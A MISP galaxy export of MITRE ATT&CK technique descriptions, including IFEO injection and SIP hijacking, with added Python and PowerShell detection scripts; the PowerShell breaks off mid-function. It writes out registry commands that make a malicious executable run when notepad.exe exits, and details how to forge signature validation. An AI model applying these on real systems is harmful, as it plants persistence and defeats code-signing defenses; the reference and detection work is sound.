- https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ - webarchive
- https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - webarchive
- https://www.f-secure.com/v-descs/backdoor_w32_hupigon_emv.shtml - webarchive
- https://www.symantec.com/security_response/writeup.jsp?docid=2008-062807-2501-99&tabid=2 - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1546.012 |
kill_chain | ['attack-Windows:privilege-escalation', 'attack-Windows:persistence'] |
mitre_data_sources | ['Command: Command Execution', 'Process: Process Creation', 'Windows Registry: Windows Registry Key Modification'] |
mitre_platforms | ['Windows'] |
Friend/Follow/Connect to targets of interest - T1344
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Once a persona has been developed an adversary will use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others. (Citation: NEWSCASTER2014) (Citation: BlackHatRobinSage)
Internal MISP references
UUID 103d72e6-7e0d-4b3a-9373-c38567305c33
which can be used as unique global reference for Friend/Follow/Connect to targets of interest - T1344
in MISP communities and other software using the MISP galaxy
External references
- http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf - webarchive
- https://attack.mitre.org/techniques/T1344 - webarchive
- https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1344 |
kill_chain | ['pre-attack:persona-development'] |
Friend/Follow/Connect to targets of interest - T1364
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
A form of social engineering designed to build trust and to lay the foundation for future interactions or attacks. (Citation: BlackHatRobinSage)
Internal MISP references
UUID eacd1efe-ee30-4b03-b58f-5b3b1adfe45d
which can be used as unique global reference for Friend/Follow/Connect to targets of interest - T1364
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1364 |
kill_chain | ['pre-attack:stage-capabilities'] |
Identify personnel with an authority/privilege - T1271
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Personnel internal to a company may have non-electronic specialized access, authorities, or privileges that make them an attractive target for an adversary. One example of this is an individual with financial authority to authorize large transactions. An adversary who compromises this individual might be able to subvert large dollar transfers. (Citation: RSA-APTRecon)
Internal MISP references
UUID 762771c2-3675-4535-88e9-b1f891758974
which can be used as unique global reference for Identify personnel with an authority/privilege - T1271
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1271 |
kill_chain | ['pre-attack:people-information-gathering'] |
Receive KITs/KIQs and determine requirements - T1239
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Applicable agencies and/or personnel receive intelligence requirements and evaluate them to determine sub-requirements related to topics, questions, or requirements. For example, an adversary's nuclear energy requirements may be further divided into nuclear facilities versus nuclear warhead capabilities. (Citation: AnalystsAndPolicymaking)
Internal MISP references
UUID acfcbe7a-4dbc-4471-be2b-134faf479e3e
which can be used as unique global reference for Receive KITs/KIQs and determine requirements - T1239
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1239 |
kill_chain | ['pre-attack:priority-definition-direction'] |
Identify job postings and needs/gaps - T1248
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Job postings, on either company sites or in other forums, provide information on organizational structure and often provide contact information for someone within the organization. This may give an adversary information on technologies within the organization which could be valuable in an attack, or provide insight into possible security weaknesses or limitations in detection or protection mechanisms. (Citation: JobPostingThreat)
Internal MISP references
UUID c721b235-679a-4d76-9ae9-e08921fccf84
which can be used as unique global reference for Identify job postings and needs/gaps - T1248
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1248 |
kill_chain | ['pre-attack:technical-information-gathering'] |
Analyze hardware/software security defensive capabilities - T1294
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
An adversary can probe a victim's network to determine configurations. The configurations may provide opportunities to route traffic through the network in an undetected or less detectable way. (Citation: OSFingerprinting2014)
Internal MISP references
UUID a1e8d61b-22e1-4983-8485-96420152ecd8
which can be used as unique global reference for Analyze hardware/software security defensive capabilities - T1294
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1294 |
kill_chain | ['pre-attack:technical-weakness-identification'] |
Discover target logon/email address format - T1255
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Email addresses, logon credentials, and other forms of online identification typically share a common format. This makes guessing other credentials within the same domain easier. For example if a known email address is first.last@company.com it is likely that others in the company will have an email in the same format. (Citation: RSA-APTRecon)
Internal MISP references
UUID ef0f816a-d561-4953-84c6-2a2936c96957
which can be used as unique global reference for Discover target logon/email address format - T1255
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1255 |
kill_chain | ['pre-attack:technical-information-gathering'] |
Identify job postings and needs/gaps - T1267
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Job postings, on either company sites, or in other forums, provide information on organizational structure and often provide contact information for someone within the organization. This may give an adversary information on people within the organization which could be valuable in social engineering attempts. (Citation: JobPostingThreat)
Internal MISP references
UUID 0722cd65-0c83-4c89-9502-539198467ab1
which can be used as unique global reference for Identify job postings and needs/gaps - T1267
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1267 |
kill_chain | ['pre-attack:people-information-gathering'] |
Identify job postings and needs/gaps - T1278
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Job postings, on either company sites or in other forums, provide information on organizational structure, needs, and gaps in an organization. This may give an adversary an indication of weakness in an organization (such as an under-resourced IT shop). Job postings can also provide information on an organization's structure which could be valuable in social engineering attempts. (Citation: JobPostingThreat) (Citation: RSA-APTRecon)
Internal MISP references
UUID 7718e92f-b011-4f88-b822-ae245a1de407
which can be used as unique global reference for Identify job postings and needs/gaps - T1278
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1278 |
kill_chain | ['pre-attack:organizational-information-gathering'] |
Analyze organizational skillsets and deficiencies - T1300
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Analyze the strengths and weaknesses of the target to identify potential areas on which to focus compromise efforts. (Citation: FakeLinkedIn)
Internal MISP references
UUID 7baccb84-356c-4e89-8c5d-58e701f033fc
which can be used as unique global reference for Analyze organizational skillsets and deficiencies - T1300
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1300 |
kill_chain | ['pre-attack:organizational-weakness-identification'] |
Exfiltration Over Other Network Medium - T1011
Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel.
Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.
Internal MISP references
UUID 51ea26b1-ff1e-4faa-b1a0-1114cd298c87
which can be used as unique global reference for Exfiltration Over Other Network Medium - T1011
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1011 |
kill_chain | ['attack-Linux:exfiltration', 'attack-macOS:exfiltration', 'attack-Windows:exfiltration'] |
mitre_data_sources | ['Command: Command Execution', 'File: File Access', 'Network Traffic: Network Connection Creation', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow'] |
mitre_platforms | ['Linux', 'macOS', 'Windows'] |
Network Traffic Capture or Redirection - T1410
An adversary may capture network traffic to and from the device to obtain credentials or other sensitive data, or redirect network traffic to flow through an adversary-controlled gateway to do the same.
A malicious app could register itself as a VPN client on Android or iOS to gain access to network packets. However, on both platforms, the user must grant consent to the app to act as a VPN client, and on iOS the app requires a special entitlement that must be granted by Apple.
Alternatively, if a malicious app is able to escalate operating system privileges, it may be able to use those privileges to gain access to network traffic.
An adversary could redirect network traffic to an adversary-controlled gateway by establishing a VPN connection or by manipulating the device's proxy settings. For example, Skycure (Citation: Skycure-Profiles) describes the ability to redirect network traffic by installing a malicious iOS Configuration Profile.
If applications encrypt their network traffic, sensitive data may not be accessible to an adversary, depending on the point of capture.
Internal MISP references
UUID 3b0b604f-10db-41a0-b54c-493124d455b9
which can be used as unique global reference for Network Traffic Capture or Redirection - T1410
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1410 |
kill_chain | ['mobile-attack-Android:collection', 'mobile-attack-iOS:collection', 'mobile-attack-Android:credential-access', 'mobile-attack-iOS:credential-access'] |
mitre_platforms | ['Android', 'iOS'] |
Determine 3rd party infrastructure services - T1260
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Infrastructure services include the hardware, software, and network resources required to operate a communications environment. This infrastructure can be managed by a 3rd party rather than by the owning organization. (Citation: FFIECAwareness) (Citation: Zetter2015Threats)
Internal MISP references
UUID 856a9371-4f0f-4ea9-946e-f3144204240f
which can be used as unique global reference for Determine 3rd party infrastructure services - T1260
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1260 |
kill_chain | ['pre-attack:technical-information-gathering'] |
Analyze presence of outsourced capabilities - T1303
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Outsourcing, the arrangement of one company providing goods or services to another company for something that could be done in-house, provides another avenue for an adversary to target. Businesses often have networks, portals, or other technical connections between themselves and their outsourced/partner organizations that could be exploited. Additionally, outsourced/partner organization information could provide opportunities for phishing. (Citation: Scasny2015) (Citation: OPM Breach)
Internal MISP references
UUID 34450117-d1d5-417c-bb74-4359fc6551ca
which can be used as unique global reference for Analyze presence of outsourced capabilities - T1303
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1303 |
kill_chain | ['pre-attack:organizational-weakness-identification'] |
Boot or Logon Initialization Scripts - T1037
Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. (Citation: Mandiant APT29 Eye Spy Email Nov 22) (Citation: Anomali Rocke March 2019) Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely.
Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.
An adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.
Internal MISP references
UUID 03259939-0b57-482f-8eb5-87c0e0d54334
which can be used as unique global reference for Boot or Logon Initialization Scripts - T1037
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1037 |
kill_chain | ['attack-macOS:persistence', 'attack-Windows:persistence', 'attack-Linux:persistence', 'attack-Network:persistence', 'attack-macOS:privilege-escalation', 'attack-Windows:privilege-escalation', 'attack-Linux:privilege-escalation', 'attack-Network:privilege-escalation'] |
mitre_data_sources | ['Active Directory: Active Directory Object Modification', 'Command: Command Execution', 'File: File Creation', 'File: File Modification', 'Process: Process Creation', 'Windows Registry: Windows Registry Key Creation'] |
mitre_platforms | ['macOS', 'Windows', 'Linux', 'Network'] |
Data from Network Shared Drive - T1039
Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within cmd may be used to gather information.
Internal MISP references
UUID ae676644-d2d2-41b7-af7e-9bed1b55898c
which can be used as unique global reference for Data from Network Shared Drive - T1039
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1039 |
kill_chain | ['attack-Linux:collection', 'attack-macOS:collection', 'attack-Windows:collection'] |
mitre_data_sources | ['Command: Command Execution', 'File: File Access', 'Network Share: Network Share Access', 'Network Traffic: Network Connection Creation', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow'] |
mitre_platforms | ['Linux', 'macOS', 'Windows'] |
Download New Code at Runtime - T1407
Adversaries may download and execute dynamic code not included in the original application package after installation. This technique is primarily used to evade static analysis checks and pre-publication scans in official app stores. In some cases, more advanced dynamic or behavioral analysis techniques could detect this behavior. However, in conjunction with Execution Guardrails techniques, detecting malicious code downloaded after installation could be difficult.
On Android, dynamic code could include native code, Dalvik code, or JavaScript code that utilizes Android WebView’s JavascriptInterface capability.
On iOS, dynamic code could be downloaded and executed through 3rd party libraries such as JSPatch. (Citation: FireEye-JSPatch)
Internal MISP references
UUID 6c49d50f-494d-4150-b774-a655022d20a6
which can be used as unique global reference for Download New Code at Runtime - T1407
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1407 |
kill_chain | ['mobile-attack-Android:defense-evasion', 'mobile-attack-iOS:defense-evasion'] |
mitre_platforms | ['Android', 'iOS'] |
Windows Management Instrumentation Event Subscription - T1084
Windows Management Instrumentation (WMI) can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may attempt to evade detection of this technique by compiling WMI scripts into Windows Management Object (MOF) files (.mof extension). (Citation: Dell WMI Persistence) Examples of events that may be subscribed to are the wall clock time or the computer's uptime. (Citation: Kazanciyan 2014) Several threat groups have reportedly used this technique to maintain persistence. (Citation: Mandiant M-Trends 2015)
Internal MISP references
UUID e906ae4d-1d3a-4675-be23-22f7311c0da4
which can be used as unique global reference for Windows Management Instrumentation Event Subscription - T1084
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/techniques/T1084 - webarchive
- https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96 - webarchive
- https://technet.microsoft.com/en-us/sysinternals/bb963902 - webarchive
- https://www.defcon.org/images/defcon-22/dc-22-presentations/Kazanciyan-Hastings/DEFCON-22-Ryan-Kazanciyan-Matt-Hastings-Investigating-Powershell-Attacks.pdf - webarchive
- https://www.secureworks.com/blog/wmi-persistence - webarchive
- https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1084 |
kill_chain | ['attack-Windows:persistence'] |
mitre_platforms | ['Windows'] |
Custom Command and Control Protocol - T1094
Adversaries may communicate using a custom command and control protocol instead of encapsulating commands/data in an existing Application Layer Protocol. Implementations include mimicking well-known protocols or developing custom protocols (including raw sockets) on top of fundamental protocols provided by TCP/IP/another standard network stack.
Internal MISP references
UUID f72eb8a8-cd4c-461d-a814-3f862befbf00
which can be used as unique global reference for Custom Command and Control Protocol - T1094
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1094 |
kill_chain | ['attack-Linux:command-and-control', 'attack-macOS:command-and-control', 'attack-Windows:command-and-control'] |
mitre_platforms | ['Linux', 'macOS', 'Windows'] |
Trusted Developer Utilities Proxy Execution - T1127
Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering. (Citation: engima0x3 DNX Bypass) (Citation: engima0x3 RCSI Bypass) (Citation: Exploit Monday WinDbg) (Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.
Internal MISP references
UUID ff25900d-76d5-449b-a351-8824e62fc81b
which can be used as unique global reference for Trusted Developer Utilities Proxy Execution - T1127
in MISP communities and other software using the MISP galaxy
External references
- http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html - webarchive
- https://attack.mitre.org/techniques/T1127 - webarchive
- https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/ - webarchive
- https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/ - webarchive
- https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1127 |
kill_chain | ['attack-Windows:defense-evasion'] |
mitre_data_sources | ['Command: Command Execution', 'Process: Process Creation'] |
mitre_platforms | ['Windows'] |
App Delivered via Web Download - T1431
The application is downloaded from an arbitrary web site. A link to the application's download URI may be sent in an email or SMS, placed on another web site that the target is likely to view, or sent via other means (such as QR code).
Detection: An EMM/MDM or mobile threat protection solution can identify the presence of unwanted, known insecure, or malicious apps on devices.
Platforms: Android, iOS
Internal MISP references
UUID 6b846ad0-cc20-4db6-aa34-91561397c5e2
which can be used as unique global reference for App Delivered via Web Download - T1431
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1431 |
Image File Execution Options Injection - T1183
Image File Execution Options (IFEO) enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., “C:\dbg\ntsd.exe -g notepad.exe”). (Citation: Microsoft Dev Blog IFEO Mar 2010)
IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<executable> where <executable> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)
IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\<executable>. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)
An example where the evil.exe process is started when notepad.exe exits: (Citation: Oddvar Moe IFEO APR 2018)
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\evil.exe"
Similar to Process Injection, these values may be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous invocation.
Malware may also use IFEO for Defense Evasion by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)
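As an added defensive check (example code, not part of the ATT&CK or MISP text) covering both IFEO entries on this page (T1546.012 above and T1183 here): parse a Registry export and flag Debugger values and GlobalFlag-enabled silent-exit monitors. The .reg text below is constructed, and the accessibility-binary list and severity labels are my assumptions.

```python
"""Scan a Windows Registry export (.reg) for the IFEO Debugger and
SilentProcessExit MonitorProcess entries described in the technique text.
Added example, not MITRE/MISP code; the .reg text below is constructed."""
import re
from typing import Dict, List, Union

Values = Dict[str, Union[int, str]]
Reg = Dict[str, Values]

IFEO = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
SPE = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit"
FLG_MONITOR_SILENT_PROCESS_EXIT = 0x200  # the GlobalFlag bit (512) set in the page's reg add example
# Accessibility binaries reachable from the logon screen (assumed list; utilman.exe is the page's example)
ACCESSIBILITY = {"utilman.exe", "sethc.exe", "osk.exe", "narrator.exe", "magnify.exe",
                 "displayswitch.exe", "atbroker.exe"}

_KEY_RE = re.compile(r"^\[(.+)\]$")
_VAL_RE = re.compile(r'^"([^"]+)"=(dword:[0-9A-Fa-f]{8}|"(?:[^"\\]|\\.)*")$')


def parse_reg(text: str) -> Reg:
    """Minimal .reg parser: REG_SZ and REG_DWORD values only, keyed by full key path."""
    keys: Reg = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        m = _KEY_RE.match(line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        m = _VAL_RE.match(line)
        if m and current is not None:
            name, data = m.groups()
            if data.startswith("dword:"):
                keys[current][name] = int(data[6:], 16)
            else:  # drop the quotes and undo .reg escaping of backslash and quote
                keys[current][name] = data[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    return keys


def audit_ifeo(keys: Reg) -> List[dict]:
    """Flag per-image Debugger values and GlobalFlag-enabled silent-exit monitors."""
    lower = {k.lower(): v for k, v in keys.items()}
    findings: List[dict] = []
    for path, values in keys.items():
        if not path.lower().startswith(IFEO.lower() + "\\"):
            continue
        image = path[len(IFEO) + 1:]
        if "\\" in image:  # nested subkeys (e.g. PerfOptions) are not per-image IFEO entries
            continue
        if "Debugger" in values:
            findings.append({"technique": "IFEO Debugger", "image": image,
                             "target": values["Debugger"],
                             "severity": "high" if image.lower() in ACCESSIBILITY else "medium"})
        gflag = values.get("GlobalFlag", 0)
        if isinstance(gflag, int) and gflag & FLG_MONITOR_SILENT_PROCESS_EXIT:
            # the monitor itself lives under the matching SilentProcessExit\<image> key
            spe = lower.get((SPE + "\\" + image).lower(), {})
            monitor = spe.get("MonitorProcess")
            findings.append({"technique": "SilentProcessExit monitor", "image": image,
                             "target": monitor, "reporting_mode": spe.get("ReportingMode"),
                             "severity": "high" if monitor else "low"})
    return findings


# Constructed export: the page's notepad.exe silent-exit example, an accessibility
# debugger, and a benign IFEO entry that must not be flagged.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"GlobalFlag"=dword:00000200

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe]
"ReportingMode"=dword:00000001
"MonitorProcess"="C:\\temp\\evil.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe]
"Debugger"="C:\\Windows\\System32\\cmd.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\legacyapp.exe]
"DisableExceptionChainValidation"=dword:00000001
'''

if __name__ == "__main__":
    for finding in audit_ifeo(parse_reg(SAMPLE_REG)):
        print(finding)
```

On a live host the same functions work on the output of `reg export` for the two keys, after converting the UTF-16 file to text.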
Internal MISP references
UUID 62166220-e498-410f-a90a-19d4339d4e99
which can be used as unique global reference for Image File Execution Options Injection - T1183
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/techniques/T1183 - webarchive
- https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/ - webarchive
- https://docs.microsoft.com/windows-hardware/drivers/debugger/gflags-overview - webarchive
- https://docs.microsoft.com/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit - webarchive
- https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ - webarchive
- https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - webarchive
- https://www.f-secure.com/v-descs/backdoor_w32_hupigon_emv.shtml - webarchive
- https://www.symantec.com/security_response/writeup.jsp?docid=2008-062807-2501-99&tabid=2 - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1183 |
kill_chain | ['attack-Windows:privilege-escalation', 'attack-Windows:persistence', 'attack-Windows:defense-evasion'] |
mitre_platforms | ['Windows'] |
SIP and Trust Provider Hijacking - T1198
In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)
Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)
Similar to Code Signing, adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and whitelisting tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)
- Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP's CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file's real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).
- Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID} that point to the DLL providing a SIP's CryptSIPDllVerifyIndirectData function, which validates a file's computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.
- Modifying the $DLL and $Function Registry values in HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID} that point to the DLL providing a trust provider's FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking a SIP's CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).
- Note: The above hijacks are also possible without modifying the Registry via DLL Search Order Hijacking, since a handler registered by bare file name (ex: WINTRUST.DLL) is resolved through the loader's search order.
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)
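The three registry locations above are the natural place to look for this technique. The following PowerShell audit is an added example, not code from MITRE or from the SpecterOps paper: it walks both registry views, resolves each registered SIP or trust-provider DLL, and reports any entry that does not resolve to a validly Microsoft-signed file in the Windows system directory. The "clean handlers live in System32/SysWOW64 and are Microsoft-signed" baseline and the `O=Microsoft Corporation` subject match are assumptions of this example.

```powershell
# Added example (not MITRE or SpecterOps code): audit the registry entries that
# SIP and trust provider hijacking abuses. Assumption: on an unmodified system
# every handler registered here resolves to a Microsoft-signed DLL in the Windows
# system directory (System32 for the 64-bit view, SysWOW64 for WOW6432Node).
# Run from an elevated PowerShell so every file is readable.

$Views = @(
    @{ Name = 'x64';   Hive = 'HKLM:\SOFTWARE';             SysDir = "$env:SystemRoot\System32" }
    @{ Name = 'wow64'; Hive = 'HKLM:\SOFTWARE\WOW6432Node'; SysDir = "$env:SystemRoot\SysWOW64" }
)

# Subkey families named in the technique description, with the value names that
# hold the DLL and the exported function. Trust providers use '$DLL'/'$Function'.
$Families = @(
    @{ Path = 'Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg';   DllValue = 'Dll';  FnValue = 'FuncName'  }
    @{ Path = 'Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData'; DllValue = 'Dll';  FnValue = 'FuncName'  }
    @{ Path = 'Microsoft\Cryptography\Providers\Trust\FinalPolicy';                      DllValue = '$DLL'; FnValue = '$Function' }
)

function Resolve-HandlerPath {
    param([string]$DllValue, [string]$SysDir)
    $expanded = [Environment]::ExpandEnvironmentVariables($DllValue)
    if ([System.IO.Path]::IsPathRooted($expanded)) { return $expanded }
    # A bare name such as WINTRUST.DLL is found via the loader's search order
    # (the DLL Search Order Hijacking avenue); we assume it belongs in SysDir.
    return (Join-Path $SysDir $expanded)
}

function Test-HandlerEntry {
    param([string]$View, [string]$Family, [string]$KeyPath,
          [string]$DllValue, [string]$FnValue, [string]$SysDir)
    $props = Get-ItemProperty -LiteralPath $KeyPath -ErrorAction SilentlyContinue
    if (-not $props) { return }
    $dll = [string]$props.$DllValue      # dynamic member lookup handles '$DLL'
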